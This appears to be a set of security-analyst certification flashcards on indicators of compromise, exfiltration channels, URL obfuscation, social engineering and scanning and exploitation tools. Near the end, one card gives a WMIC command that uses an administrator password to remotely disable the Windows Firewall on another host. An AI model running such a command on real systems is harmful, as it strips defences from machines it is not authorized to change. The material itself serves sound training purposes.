Authorized network scans should be performed from pre-authorized devices. Scans and network sweeps are useful tools in the security analyst's arsenal as they help to identify issues such as unauthorized devices and software or misconfigured hosts. Scans originating from unauthorized locations and devices should be immediately investigated. Intrusion detection systems can detect most types of scanning activity, though there are some methods of evading detection, such as sparse scanning.
Scan sweeps on Internet-facing systems are a common occurrence and less likely to be prioritized for investigation. Identification of other indicators of compromise can be compared to historical data to determine if the intrusion correlates to scanning activity and reveals additional information about the attacker.
Term
non-standard port
Definition
Communicating TCP/IP application traffic, such as HTTP, FTP, or DNS, over a port that is not the well-known or registered port established for that protocol.
Term
mismatched port/application traffic
Definition
Communicating non-standard traffic over a well-known or registered port.
Term
Non-standard Port Mitigation
Definition
The best way of mitigating use of non-standard ports is to configure firewalls to allow only whitelisted ports to communicate on ingress and egress interfaces. Unfortunately, this type of policy is difficult to put into practice, as it tends to cause numerous support issues for legitimate applications. Configuration documentation should also show which server ports are allowed on any given host type. This can then be used to create detection rules for non-standard port usage. Detection rules can also be configured to detect mismatched protocol usage over a standard port.
Term
Shell and Reverse Shell
Definition
As well as beaconing and data transfer, adversaries will often want to use a Remote Access Tool/Trojan (RAT) to obtain a shell on the compromised system and run commands. A shell is where the attacker opens a listening port that exposes the command prompt on the local host and connects to that port from a remote host.A reverse shell is where the attacker opens a listening port on the remote host and causes the infected host to connect to it. Traffic received by the infected host is then redirected to the command prompt. A reverse shell is typically used to exploit organizations that have not configured outbound traffic filtering at the firewall.
Term
Processor usage
Definition
Processor usage—Monitoring the per-process percentage of CPU time to locate problems. Monitoring real-time CPU usage of running processes can be accomplished on Windows using Task Manager and Performance Monitor.
Term
Memory consumption
Definition
Overall percentage of memory usage is not necessarily an IoC. Windows is optimized to make as much use of system memory as possible. Per-process use of memory is useful but varies widely. Many web browsers use an astonishing amount of system memory while running! Typical usage can be obtained using online resources such as shouldiblockit.com or simple search engine queries.
Term
File and File System Viewers
Definition
The standard Windows dir command has some advanced functionality for file system analysis. The following dir command switches can help to identify file system anomalies:
§/Ax filters all file/folder types that match the given parameter (x). For example, dir /AH displays only hidden files and folders. Malicious files marked as hidden are much easier to find this way rather than looking through every entry, especially if the folder contains hundreds or thousands of files.
§/Q displays file ownership, along with the standard information. Sometimes, sensitive files are given ownership to an unknown or unauthorized user by using this switch.
§/R displays alternate data streams for a file. Attackers can use alternate data streams (ADSs) for anti-forensics purposes, and being able to spot an ADS can help identify a malicious process attached to a legitimate file.
Term
Drive Capacity Consumption
Definition
Applications and processes that consume a lot of drive capacity may be malicious. Malware sometimes caches files locally for exfiltration over the network or USB. Malware may also generate substantial log data if it is performing network scans. Disk utilization tools scan the file system and retrieve statistics, including the following:
§Visual representation of storage space. For example, a tree map can represent a hierarchy of folders and increase the visual size of folders, depending on how much data they hold.
§A directory listing of storage space, with folders and files sortable by size, extension, number of files, and more.
§The real-time usage of information being written to a disk.
Term
File System Analysis Tools for Linux
Definition
Linux comes with several tools to aid in analyzing the file system. One such tool is lsof, which retrieves a list of all files currently open on the OS. Although the output of lsof can be customized, it typically provides the following for each file:
§The process ID for the process that has the file open
§The owner of the process
§The size of the file
§The file's local or network address
§The file's TCP state, if applicable
§The file's access mode
Linux distributions include df and du command line tools for checking disk usage. With df, information about disk space use by all mounted file systems, as well as how much space is available for each, is displayed. The du command displays disk space used by each directory in a specified directory. To identify how large the /var/log/ folder is, the command du /var/log can be used.
Term
Unauthorized Scheduled Tasks
Definition
Scheduled Tasks is the Windows utility designed to allow routine or important maintenance processes to run in an organized and automated way. Scheduled tasks are often used to run backups and maintenance scripts and are also often abused by attackers and malware. Malware may use scheduled tasks to automate communication with a C&C server or launch a reverse shell when the system restarts. Monitoring scheduled tasks for changes and reviewing new items is important to ensure they are authorized.
Changes to Windows Scheduled Tasks generate an event recorded in the System or Security Event Log containing details about the change, such as the task's name, who made the change, and a timestamp. Event ID 4698 indicates a scheduled task was created or modified, and Event ID 4700 indicates a scheduled task was enabled or disabled. Searching for events using key words like "Task Scheduler" or "Task Scheduler Service" can also help locate activity.
Term
File System or Registry Changes
Definition
File system and registry changes can indicate or suggest a security breach or attack has occurred. An attacker may change critical system configuration stored in system files or registry keys to change or disable essential security settings or store malware and scripts.
§The creation of new files or folders in unexpected locations or with unusual names can be a sign of an attack.
§Unexpected or unauthorized changes to files can be a sign of tampering.
§Removing temp files, clearing temp folders, or deleting log entries can be a sign that an attacker is trying to cover their tracks and remove evidence of their actions.
§Changes to registry keys related to security settings often indicate an attempt to gain unauthorized access to or disable security features.
§Unauthorized changes to user accounts or group membership could indicate an attempt to gain elevated privileges or to create a backdoor. User and group settings are stored in /etc/passwdand /etc/groupconfiguration files on Linux systems.
Term
Process Analysis Tools for Windows
Definition
§The ProcessMonitorand ProcessExplorertools in the Sysinternalssuite are widely used for live analysis and logging. It is also worth watching Sysinternals developer Mark Russinovich's presentation on advanced malware hunting techniques using Sysinternals (https://www.youtube.com/watch?v=A_TPZxuTzBU).
§tasklistis a command line version of TaskManager, displaying memory usage, the state of running threads, a process tree, and individual operations for each process. taskkillcan be used to terminate suspect processes.
§PE Explorer (heaventools.com) is proprietary software that offers a variety of different features, including the ability to browse the structure of 32-bit Windows executable files. The main advantage of this is that you can observe what a program is accessing, like what dynamic-link libraries (DLLs) it calls and how it interfaces with other applications on the system, as well as how it uses application programming interfaces (APIs).
Term
Sysinternals Process Explorer
Definition
Process Explorer provides much deeper insight into the operation of processes currently running on a system.
These processes are often targets of attack or are mimicked to hide and obfuscate malware. The presence of multiple versions of these files, or these files running in any location other than the System32folder, is indicative of infection. Right-clicking any of these processes in ProcessExplorerand selecting "Properties" reveals more details, including location, parent, and autostartlocation. Clicking the verifybutton validates the process's digitalsignature. ProcessExploreralso allows easy submission of the executable to VirusTotalfor malware analysis.
Term
Process Analysis Tools for Linux
Definition
Like Windows, Linux programs can be foreground/interactive processes requiring user input or background (noninteractive). Background services are known as daemons and typically use a process name ending in a "d." When Linux boots, the kernel image is loaded into memory and executes an initdaemon(usually systemd), which always has the process ID (PID) 1. The init daemon loads all the processes listed in its configuration file(s). A process launched by the user will be a child process to a parent process, such as the shell. Each process has a unique PID and a parentprocessID(PPID). The pstreecommand can show the parent/child relationships of processes. The pscommand lists the attributes of all current processes. By default, the command only displays processes started by the current user. A full list of all user processes can be viewed using the -Aor -eswitches. By default, the command shows the user that started the process, the PID and PPID, the TTY (which terminal executed the process), the execution time of the process, and the name of the process itself. Results can be filtered—for example, to find the process ID of cron, enter ps-C cron. Results can also be sorted by piping to the sort command—for example, to find the processes with the highest CPU utilization, enter ps -A | sort -k 3to sort processes by execution time (which appears as column 3).
Term
Understand Unauthorized Change Concepts
Definition
An attacker may try to change how a device or application behaves to exploit some vulnerability or open a new vector to initiate an attack.For example, the attacker may open ports, start services on a workstation, or add a directory exclusion to scanning software, enabling them to take remote control of the host.
Unauthorized changes can also relate to suspicious hardware usage. A USB monitoring utility can report on devices attached to a system, which may supply evidence of the initial contamination vector or that data was removed.
The firmware of USB flash drives can be manipulated to make the device operate like a different device class, such as a keyboard, so it can be used to inject keystrokes into the host and execute preprogrammed commands. This type of attack is not very stealthy because it requires starting a command prompt window to "type" commands and writing changes to the Registry and system files.
Term
Unauthorized Privileges
Definition
After initial exploitation, one of the first objectives of an attack is typically to gain administrative access to the exploited system. A privilege escalation attack provides higher-level system access or functionality that the current user account would not usually have. One of the most common scenarios is when a regular user can exploit some vulnerability in a system to gain administrator or root-level privileges.
Privilege escalation attacks exploit a vulnerability or a misconfiguration in a system to escalate privileges beyond what was intended. After obtaining higher-level access, the attacker can access sensitive data, modify system configurations, or execute malicious code. This attack can be very damaging because it allows attackers to gain complete control over an entire network of devices. Oftentimes a privilege escalation attack results in administrative user access, and (in the case of Windows OS) the administrative user can then often control and modify the entire Windows desktop and server infrastructure.
Term
privilege escalation
Definition
The practice of exploiting flaws in an operating system or other application to gain a greater level of access than was intended for the user or application.
Term
Common IoCs Associated With Account Usage:
Definition
Unauthorized sessions—When accounts access devices or services they should not be authorized to access. For example, a user with limited privileges should not be able to access a Domain Controller—only administrators should have access to this, which could indicate unauthorized privilege escalation and compromise of the server.
Failedlogons—Some failed logons are normal behavior of users mistyping or temporarily forgetting a password. Repeated, rapid failures for a single account are suspicious, especially for administrator and root accounts. Password attacks make thousands of attempts in a very short period.
Newaccounts—An attacker may create new accounts to enable easy access. Only a few individuals should be authorized to create new accounts, and account creation activity must be closely monitored.
Guestaccountusage—Guest accounts should be disabled. While guest accounts don't have many privileges, they enable attackers to easily access a domain.
Off-hours usage—Depending on the normal work hours, account usage after hours may indicate an attacker attempting to access the environment while little or no staff are at work.
Term
Abnormal Behavior
Definition
As well as abnormal user account behavior, monitoring changes to system policies (especially security policies) or privileges is also important. Microsoft provides several tools to help identify if a policy deviates from an established configuration baseline. Privilege changes can be tracked using the audit log or analyzed using tools like SysinternalsAccessChkand AccessEnum.
Term
Data exfiltration is accomplished in many ways, and some examples include the following:
Definition
HTTP(or HTTPS) transfers to file-sharing sites or suspicious domains. OneDrive, Dropbox, or GoogleDrivecan be used to receive exfiltrated data. Blocking employee access to the sites makes the detection of malicious use easier.
HTTPrequests to database-backed services. An adversary may use SQLinjectionor similar techniques to copy records from a database they should not have access to. Web Application Firewalls (WAF) can detect injection attacks. Other indicators of injection-style attacks are spikes in requests to PHP files or scripts and unusually large HTTP response packets.
DNSexploitsfor exfiltration and C&C activity. Indicators include atypical query types from client workstations. Most client requests are for host (A or AAAA) namerecordsusing UDP. Requests for TXT, MX, CNAME, and NULL records or DNS over TCP are typically suspicious.
Communication using FTP, IM, P2P, and email is also common and might involve consumer services such as Outlook.com, Gmail, and others.
Traffic tunnels such as SSH or VPNs are also indicative of suspicious communication.
Term
Nessus
Definition
One of the best-known commercial vulnerability scanners, produced by Tenable Network Security.
Term
OpenVAS
Definition
An open-source vulnerability scanner, originally developed from the Nessus codebase at the point where Nessus became commercial software.
Term
Qualys's
Definition
A cloud-based vulnerability management solution. Users install sensor agents at various points in their network, and the sensors upload data to the cloud platform for analysis.
Qualys's vulnerability management solution is a cloud-based service. Users install sensors at various points in their network, which can include cloud locations, and the sensors upload data to the Qualys cloud platform for analysis. The sensors can be implemented as agent software running on a host, as a dedicated appliance, or as a virtual machine (VM) running on a platform such as VMware. You can also deploy passive network sensors, out-of-band sensors for air-gapped hosts, and agents for cloud infrastructure and container apps. As well as the network vulnerability scanner, there is an option for web application scanning.
Term
Nmap
Definition
An IP and port scanner used for topology, host, service, and OS discovery and enumeration.
TCP SYN (-sS)—This is a fast technique also referred to as half-open scanning as the scanning host requests a connection without acknowledging it. The target's response to the scan's SYN packet identifies the port state.
TCP connect (-sT)—A half-open scan requires Nmap to have privileged access to the network driver so that it can craft packets. If privileged access is not available, Nmap has to use the OS to attempt a full TCP connection. This type of scan is less stealthy.
TCP flags—You can scan by setting TCP headers in unusual ways. A Null (-sN) scan sets the header bit to zero, a FIN (-sF) scan sends an unexpected FIN packet, and an Xmas scan (-sX) sets the FIN, PSH, and URG flags. This was a means of defeating early types of firewalls and IDS.
UDP scans (-sU)—Scan UDP ports. As these do not use ACKs, Nmap needs to wait for a response or timeout to determine the port state, so UDP scanning can take a long time. A UDP scan can be combined with a TCP scan.
Port range (-p)—By default, Nmap scans 1,000 commonly used ports. Use the -p argument to specify a port range or use ‑‑exclude‑ports.
Term
Nmap Port States
Definition
Open—An application on the host is accepting connections.
Closed—The port responds to probes (with a reset [RST] packet), but no application is available to accept connections.
Filtered—Nmap cannot probe the port, usually because a firewall is silently discarding the probes.
Some types of scanning classify port states where the scan is unable to determine a reliable result:
Unfiltered—Nmap can probe the port but cannot determine whether it is open or closed. This port state is used with an ACK scan, the purpose of which is to test a firewall ruleset.
Open|Filtered—Reported by some types of scan (notably UDP and IP protocol) when Nmap cannot determine if the port is open or filtered.
Closed|Filtered—Reported by TCP Idle scans that cannot determine whether the port is closed or filtered.
Nmap Output Options
Nmap output scan results can be saved to a file instead of only displayed to the console. Several options exist, including the following:
Normal (-oN)—Human-readable output directed to a file for analysis later.
XML (-oX)—Output using XML formatting to delimit the information.
Grepable output (-oG)—This delimits the output using one line for each host and tab, slash, and comma characters for fields. This format makes it easier to parse the output using the grep command.
Term
Pretexting
Definition
In this attack, the attacker creates a false story or scenario to deceive the victim.For example, an attacker might phone an employee and pretend to be someone from the IT department, asking for their username and password to help solve an urgent problem.
Term
Baiting
Definition
In this attack, the attacker uses a promise or reward to lure the victim into sharing personal or confidential information, like a password.For example, an attacker often leaves a USB drive in a conspicuous location to tempt someone to connect it to their computer. The USB drive typically contains malware designed to autorun or an intriguing document with macros. Autorun-enabled malware is less effective on newer operating systems that disable autorun capability, so the intriguing document approach is much more common. A common example of this attack is to create a file with a name like "executive bonuses" or "staff layoff plans." Once opened, the file contains macro code designed to exploit the computer.
Term
Phishing
Definition
The most common type of attack leverages emails with malicious hyperlinks or malware-infected attachments. Clicking on the link leads the user to a website that typically prompts for credentials, or opening the attachment leads to the execution of a macro file resulting in an infection or launching a reverse shell.
Term
Simulating Social Engineering Attacks
Definition
To measure social engineering vulnerabilities, security analysts can play the role of the attacker by using various tools designed to help in this endeavor. Baiting and phishing attack simulations are very common and follow the same approach as an actual attack.
Several commercial tools are available to help organizations create and track various "campaigns." A campaign is designed to focus on one specific metric and runs during a defined time frame. Most commercial tools are cloudbased and offer sophisticated tracking and reporting capabilities. Social engineering assessment can also use open-source tools. Two very popular tools are the Social-Engineer Toolkit(SET)https://github.com/trustedsec/social-engineer-toolkit and Gophishhttps://getgophish.com/. The Social-Engineer Toolkit offers many capabilities, such as creating a legitimate-looking webpage or creating malicious attachments, whereas Gophish is more focused on providing a user-friendly graphical interface and tools for managing campaigns.
Term
URL Shorteners
Definition
URL shorteners are online tools for creating short links from long URLs. They are common on social media, where character limits are a concern. While they offer convenience, they also pose security risks. Malicious actors can use URL shorteners to disguise harmful content, conduct social engineering attacks, and collect user data.
One of the primary risks associated with URL shorteners is phishing attacks. Attackers can use shorteners to disguise malicious links to trick unsuspecting users into clicking them. Additionally, URL shorteners often bypass controls like URL filtering and blocklisting, making detecting and mitigating malicious activity more difficult.
Another risk is data privacy. When users create shortened URLs, they often provide information to the shortening service, such as the original URL, the date and time of creation, and the IP address associated with the creator of the shortened link. This information can be used to track user activity across the Internet.
URL shorteners rely on third-party services to redirect users to the original URL. The shortened URL may no longer work if the third-party service goes offline or the link is not correctly maintained. This characteristic is typically referred to as "link rot."
To mitigate these risks, users should be cautious when clicking on shortened URLs, particularly if unfamiliar with the source. They should also use reputable URL shorteners and avoid creating shortened links for sensitive information. Additionally, users should inspect shortened URLs by revealing the original site.
Term
URL Un-shortening
Definition
Clicking a shortened link is not a good method of determining where it leads! If the link leads to a malicious site, then clicking it will lead to trouble. Fortunately, there are several sites designed to help investigate shortened URLs without clicking them, such as unshorten.me or VirusTotal
Term
QR Codes
Definition
QR codes offer convenience and are often used to replace URLs. Most modern camera apps have built-in QR code recognition, allowing users to scan codes to visit websites without typing or clicking. QR codes offer a "fun factor," which makes them all the more enticing for users and effective for attackers.
Term
URL Doppelgangers
Definition
A doppelganger domain is one that is missing the dot between the subdomain and domain part, for example wwwgoogle.com instead of www.google.com. A savvy attacker may work to locate doppelgangers for popular websites and then register them as unique domains hosting malicious content. Fortunately, Google owns the doppelganger for their site, and it redirects to the originally intended destination.
Term
Character Swapping
Definition
Character swapping substitutes one or more characters in a URL for very similar looking ones. Viewing the URL, especially depending on the font style, may not easily identify that the link is incorrect.
[image]
Term
URL Encoding
Definition
URL encoding seeks to mask the content of a URL to avoid pattern matching or simple visual inspection detection methods and to confuse engineers, analysts, and users.
The following examples demonstrate a few methods to encode the URL https://www.comptia.org/certifications/cybersecurity-analyst/.
In this example, colons and slashes are replaced with their URL encoded (hexadecimal) equivalents, %3A represents : and %2F represents /.
A search bar is at the top. Below it are the options all, images, videos, news, maps, shopping, answer, and settings. Answer option is selected. The U R L is written in bold below the options along with the U R L decode.
Screen capture of the DuckDuckGo® search engine decoding a URL. (Screenshot courtesy of DuckDuckGo®.)
In this example, the entire URL is encoded using base64 and preceded with some qualifiers to help identify its purpose. Loading the string into a browser reveals what the string of characters represents.
The address bar contains the encoded string, and its translation is displayed in the body of the page.
Term
URL Redirects
Definition
In the context of obfuscation, URL redirects often take advantage of a poorly secured website. Website developers often program redirect functionality within their pages to send visitors to companion sites and payment processors. This redirect capability can be abused, allowing an attacker to use the site to send visitors anywhere. The redirect URL often looks like:
The vulnerable component is a PHP element and could use any name, not just "redirect.php" as shown in here. The vulnerable component may use a different language, but PHP is very common. For example, if Google had this vulnerability on their site (they do not), the redirect may look like:
The appeal of this obfuscation method is that the URL's root (www.google.com) is trustworthy, but the user will land on the page referenced in the redirect, which is likely not trustworthy. Combining this method with other obfuscation techniques to mask the redirection URL can make it highly effective.
Term
Angry IP Scanner
Definition
Angry IP Scanner (https://angryip.org) is a graphical network scanning tool. The executable file (ipscan.exe) can quickly scan a network to identify connected devices, including configuration information and software versions.
[image]Description
The top section has boxes to fill in the I P range, hostname, and I P. A start button also present there. The table below displays the I P, ping, hostname, ports, and web detect.
Angry IP Scanner performing network reconnaissance. (Screenshot courtesy of Angry IP Scanner.)
Term
Metasploit Framework (MSF)
Definition
A platform for launching modularized attacks against known software vulnerabilities.
Metasploit Framework (MSF) is a very powerful collection of tools designed to exploit vulnerabilities in a wide range of systems and software. Metasploit Framework contains modules designed to exploit vulnerabilities. In the simplest terms, Metasploit can enable an attacker to gain unauthorized access with the least amount of complexity.
From the perspective of analysis, Metasploit can be used to validate the risk of a vulnerability by exploiting it. In particular, the Pro version of Metasploit includes advanced features and a web-based user interface for identifying and validating vulnerabilities. Many Metasploit tools and utilities are known to modern antimalware software, which will alert and block attacks it initiates.
Term
Recon-ng
Definition
Recon-ng has a syntax and use that parallels Metasploit Framework but Recon-ng is focused on performing web-based reconnaissance. Recon-ng uses workspaces to help organize information, and its functionality can be greatly expanded through the use of numerous add-on modules.
Recon-ng can speed the collection of host and domain information, quickly revealing an organization's external footprint to an attacker, such as IP addresses, subdomains, software versions, and many other attributes. It can also be used by analysts to review and monitor an organization's footprint to ensure it complies with policy and other security mandates.
Term
Maltego
Definition
Maltego is a tool specifically designed for information gathering and visualizing the relationships between various entities. It can gather information about domains, IP addresses, and other network entities to help identify potential targets for a cyber attack.
Term
Burp Suite
Definition
A proprietary interception proxy and web application assessment tool.Burp Suite is a web application security testing tool that provides comprehensive features for identifying and mitigating security vulnerabilities.
Burp Suite is a very popular tool for analyzing and exploitingwebapplications and is developed and maintained by PortSwigger Web Security (portswigger.net). As well as an interceptionproxy, Burp can perform automatedtasks such as contentdiscovery, fuzzing, passwordattacks, injectionattacks, vulnerabilityscans, and much more. Burp Suite is available as a feature-restricted community edition and a subscription-based professional edition. Most advanced and automated features are only available in the professional edition.
Burp Suite includes an integrated browser pre-configured to use the intercepting proxy. Browser activity is captured, or "intercepted," and displayed on the Proxy Intercept tab. The proxy controls browsing activity, so each request is "held" until the tester is ready to proceed. This behavior allows the request to be inspected and potentially modified to manipulate the web application's operation, such as changing content-type parameters, cookie values, data values, and many other options.
Term
Zed Attack Proxy (ZAP)
Definition
An open-source interception proxy and web application assessment tool.
OWASP ZAP (Zed Attack Proxy) is a popular open-source webapplicationtestingtool. It has many features to support automatedscanning, inputmanipulation, and APItesting. Key features include an interceptingproxyfor intercepting and modifyingrequestsand responses between the browser and webapplicationand an activescannerthat can identify vulnerabilities such as SQLinjectionand cross-sitescripting(XSS). Its plugin architecture can extend its capabilities, allowing users to create and share custom scripts and plugins. Additionally, ZAP provides detailed reports and alerts to help quickly identify and prioritize security issues.
Term
Nikto
Definition
Web application vulnerability scanner that can be used to identify known web server vulnerabilities and misconfigurations, identify web applications running on a server, and identify potential known vulnerabilities in those web applications.It can quickly scan multiple web servers and provide comprehensive information on any detected vulnerabilities.
Nikto is another popular web application scanner designed to use the command line, and the project website is https://www.cirt.net/nikto2. Nikto can discover the type of HTTP server and web applications running on a host and expose vulnerabilities contained within them.
Nikto scans using default settings can be easily performed using the command nikto -h
Term
Arachni
Definition
An open-source web application scanner
Arachniis another open-source web scanner application (arachni-scanner.com) available with both command line and web-based graphical interfaces. By default, the scanner audits HTML forms, JavaScript forms, JSON input, XML input, links, and any orphan input elements. The scanner actively tests many different vulnerabilities, including code injection, SQL injection, XSS, CSRF, local and remote file inclusion, session fixation, directory traversal, backdoors, insecure policies, server information leakage, personal data exposure, and others.
Arachni categorizes the severity of potential issues as high, medium, low, or informational. Arachni provides a detailed description of each vulnerability, the location in the web app where the vulnerability was exploited, what input was used to exploit it, and what document object model (DOM) element was exploited. In some cases, Arachni also links to the Common Weakness Enumeration (CWE) entry for some vulnerabilities to provide a more detailed description of an issue. It also reports specific information about how the scanner managed to exploit a vulnerability, including the specific HTTP request that triggered the issue and the server's response. Arachni provides more than technical details; there are also tabs for case management and issue timelines.
Term
Immunity Debugger
Definition
Appgate's Immunity Debugger is an advanced debugger and analysis tool used to reverse engineer and debug software. It is open-source and very popular among reverse engineers, malware analysts, and security researchers.
The Immunity Debugger provides comprehensive debugging and analysis features, such as memoryanalysis, simultaneousprocessanalysis, breakpoints, and run-timepatching. It includes extensive features, such as dynamicanalysis, signaturescanning, and codetracing. Immunity Debugger also supports a variety of architectures, including x86, x64, and ARM. Additionally, it supports scripting in Python and other languages, allowing analysts to customize and automate tasks.
Term
GNU Debugger
Definition
The GNU Debugger is a widely used debugging tool for Linux-based applications. It allows developers to examine and debug applications, inspect the runtime state, and modify the program's execution flow.
The GNU Debugger, also known as GDB, is a powerful debugging tool used to debug programs written in various programming languages such as C, C++, and Fortran. The GNU Project maintains GDB as open-source software. The GNU Debugger allows debugging both user-space and kernel-space programs. It can analyze the behavior of applications by inspecting memory, viewing the stacktrace, and trackingapplicationsourcecode. It also allows users to modify the application's source code while debugging to manipulate its operation. GDB can debugLinux, Mac OS X, and Windows programs and is compatible with several compilers such as GCC, Clang, and VisualStudio.
Term
ScoutSuite
Definition
An open-source cloud vulnerability scanner designed for AWS, Azure, and GCP auditing.
ScoutSuite(github.com/nccgroup/ScoutSuite) is a powerful open-source security auditing tool used to assess cloud infrastructure security. It allows organizations to evaluate the security of their cloud environments across multiple providers and services, such as Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP). The tool collects data from a cloud platform using API calls. Then it compiles a report of all the discovered objects, including VM instances, storage containers, IAM accounts, data, firewall ACLs, and many others. The scanner ruleset can categorize discovered items with severity levels based on predetermined policies.
ScoutSuite is an open-source multi-cloud security auditing tool that supports AWS, Azure, and GCP environments. It assesses the security posture of cloud environments and provides a concise view of potential security risks and misconfigurations.
Term
Prowler
Definition
An open-source cloud vulnerability scanner designed for AWS auditing.Prowler is an open-source security tool that helps organizations evaluate their Amazon Web Services (AWS) infrastructure and ensure it adheres to industry best practices and compliance standards.
Prowler (github.com/toniblyx/prowler) is an audit tool for use with AWS only. It can detect misconfigurations and security issues, such as weak passwords, unpatched systems, and insecure protocol use. It can also be used to evaluate cloud infrastructure against the CIS Benchmarks™ for AWS (cisecurity.org/benchmark/amazon_web_services) and perform regulatory compliance checks.
Term
Pacu
Definition
Pacu is an open-source Amazon Web Services (AWS) exploitation framework for penetration testing engagements in AWS environments. It automates various attack scenarios and helps validate the effectiveness of cloud security controls.
An open-source cloud penetration testing framework.
Pacu(github.com/RhinoSecurityLabs/pacu) is designed as an exploitation framework for evaluating the security of an AWS environment. It includes modules for exploiting APIs and VM instances. An attacker or pen tester can use cloud-access credentials to determine how they may be abused to gather information about other accounts and configured services, or gain unauthorized access to cloud services.
Term
Shell Scripts
Definition
Shell scripts allow users and administrators to automate tasks using a scripting language like Bash or PowerShell. Shell scripts are perfect for repetitive or complicated tasks and are versatile, ranging from a few simple commands to highly complex programming structures.
Shell scripts are essential for automation and efficiency, and they can automate many tedious tasks that otherwise require slow and error-prone manual effort.For example, shell scripts are great for creating backups, automating software updates, performing software installations, and automating system maintenance.
Shell scripts are essential for automation and efficiency, and they can automate many tedious tasks that otherwise require slow and error-prone manual effort.For example, shell scripts are great for creating backups, automating software updates, performing software installations, and automating system maintenance.
Analysts can use shell scripts to locate important information stored in logs or automate complicated commands that depend on command line tools.For example, a script can use Nmap to find hosts with active ports 80 and 443 and then perform additional steps to collect more information about the discovered services before saving the results to a file.
Pen testers and attackers also leverage shell scripts to perform various tasks to enumerate hosts and networks or automate the steps required to exploit vulnerabilities.
Term
PowerShell (PS)
Definition
A command shell and scripting language built on the .NET Framework that uses cmdlets for Windows automation
PowerShell (PS)provides similar command line capabilities as UNIX and Linux systems. Early editions of the Windows operating system utilized the command prompt (cmd.exe). The cmd command line interpreter is still supported by new editions of Windows, but PowerShell offers far greater capability and is well suited to scripting.
Many of the same concepts used in Linux shell scripting also apply to PowerShell, but the command syntax is different. PowerShell is easily recognized by its use of cmdlets that utilize a Verb-Noun syntax. Examples of PowerShell cmdlets include Get-Help, Invoke-Command, New-Item, Set-Content, and many others. PowerShell scripts use the file extention .ps1.
Term
Windows Management Instrumentation Command-Line (WMIC)
Definition
A tool that provides an interface into Windows Management Instrumentation (WMI) for local or remote management of computers.
Windows Management Instrumentation Command-Line (WMIC) is a powerful command line tool for performing administrative tasks and is well suited to scripting and automation. WMIC is part of the Windows Management Instrumentation (WMI) framework. It allows administrators to query, configure, and manage various system components, such as the operating system, hardware, and services. It also provides access to hardware and software information and can be used to manage and deploy applications remotely.
Term
The power and versatility of WMIC also makes it a valuable tool for attackers. One popular capability of WMIC is process call create which allows an authenticated user to start a command on a remote host. This example uses WMIC to issue a command on the remote host 10.0.2.6 to disable the Windows Firewall:
Definition
wmic /node:10.0.2.6 /user:Administrator /password:CySAisC00L! process call create "cmd.exe /c netsh advfirewall set allprofiles state off"
Term
Python
Definition
A high-level programming language that is widely used for automation.
Python is an interpreted, high-level, general-purpose programming language used for a wide variety of purposes. It is versatile for everything from simple scripts to advanced web and desktop applications. Python is highly customizable and benefits from a large community of contributors. There are thousands of third-party libraries for Python to help adapt it to practically any purpose. Python is used in data science, finance, computer science, system development, software engineering, cybersecurity, and many other fields.
Python programs and scripts use the .py file extension. Running python scripts requires the Python runtime, which is frequently included by default on many Linux systems. The extensibility and power of Python scripts allow them to perform many adversarial tasks. With the right skills, Python can perform everything from reconnaissance to exploitation, persistence, and cleanup.
Term
Regular expressions (regex)
Definition
A group of characters that describe how to execute a specific search pattern on a given text.
Regular expressions can validate data, find patterns in large amounts of text, search and replace text, validate email addresses, search for phone numbers, and replace instances of one word with another.
Term
JavaScript Object Notation (JSON)
Definition
A file format that uses attribute-value pairs to define configurations in a structure that is easy for both humans and machines to read and consume.
Input validation and transport encryption controls are essential protections for XML and JSON communication.
Term
Extensible Markup Language (XML)
Definition
A system for structuring documents so that they are human and machine readable. Information within the document is placed within tags, which describe how information within the document is structured.
Like Hypertext markup language (HTML), which is the standard language for documents designed for use in a web browser, Extensible Markup Language (XML) is a text-based markup language that uses tags derived from SGML. Unlike HTML, the primary purpose of XML is to transfer data, not display it. XML also uses opening and closing tags, but one of the key differences of XML is that the language itself does not define the “tags.” Instead, the author can invent the tags and the structure, allowing the developer to tag the data fields with something more meaningful.
Term
Anomalous Activity
Anomalous computer activity includes a wide range of activities, from harmless glitches to malicious cyberattacks. Some examples of anomalous activity include hardware failures, software bugs, human error, or cyber-attacks. Anomalous activity may or may not be malicious. It is up to the security analyst to determine the difference.
Definition
Unusual Network Traffic—This can include unexpected spikes in network activity, unusual data flow patterns, and communication with suspicious or unfamiliar IP addresses.
Abnormal Resource Utilization—This can include unusually high CPU or memory usage, which may be caused by malware, password attacks, resource-intensive applications, or hardware failures.
Suspicious User Behavior—This can include unauthorized attempts to access sensitive data, changes to system configurations or settings, the installation of unauthorized software, or accounts performing actions they should not be able to complete.
Unusual System Events—This can include error messages, system crashes, or unexpected shutdowns, which software bugs, hardware failures, or malicious activity may cause.
Term
Introduction of New Accounts
Definition
Introducing new accounts can indicate malicious activity, such as an attempt to gain unauthorized access to a system or network.
In many cases, attackers will create accounts to bypass existing security measures, such as passwords or multifactor authentication, or to gain elevated privileges on a system. New accounts are also a common means of establishing a backdoor, which can be used to maintain access or launch further attacks.
New accounts can also signify insider threats, where an employee or contractor may be attempting to gain access to data or systems they are not authorized to use. Sometimes employees create "ghost" accounts to obfuscate their activity and hide their primary user account from being listed on activity reports.
It is important to note, however, that introducing new accounts is not necessarily suspicious, as creating accounts is necessary for new employees and contractors. It is essential to consider the context in which new accounts are introduced to determine whether they are suspicious.
Term
Unexpected Output or Outbound Communication
Definition
Unexpected output can be a sign that an attacker has successfully compromised a system and is attempting to exfiltrate data, establish a backdoor, obtain secondary infectors, or communicate with a C&C system.
Term
examples of unexpected output
Definition
Event
Description
Unusual network traffic
This can include unexpected spikes in network activity, communication with unfamiliar IP addresses, or unusual data flow patterns, which may indicate data exfiltration or command and control (C2) activity.
Unexpected files or processes
This can include the appearance of unknown files or processes on a system, which may indicate malware or an attacker with access to a system.
Unexpected communication
This can include unexpected communication between applications and systems, which may indicate attempts to exploit vulnerabilities, establish a C2 channel, or exfiltrate data.
Communication with suspicious IP addresses
This can include communication with IP addresses that are known to be associated with malware, phishing campaigns, or other cyberattacks.
Unusual communication protocols
This can include unusual communication protocols not typically used in the environment, which may indicate attempts to bypass security measures or establish a C2 channel.
Large data transfers
This can include the transfer of large amounts of data to external IP addresses, which may indicate data exfiltration or the theft of sensitive data.
Communication during unusual times
This can include communication during unusual hours or outside of normal business hours, which may indicate attempts to evade detection.
Communication with suspicious domains
This can include contact with domains that are known to be associated with phishing campaigns, cyberattacks, or domains that have been recently registered.
Encrypted communication
This can include encrypted or obfuscated communication, which may indicate attempts to hide malicious activity from security personnel.
Term
Service Interruption
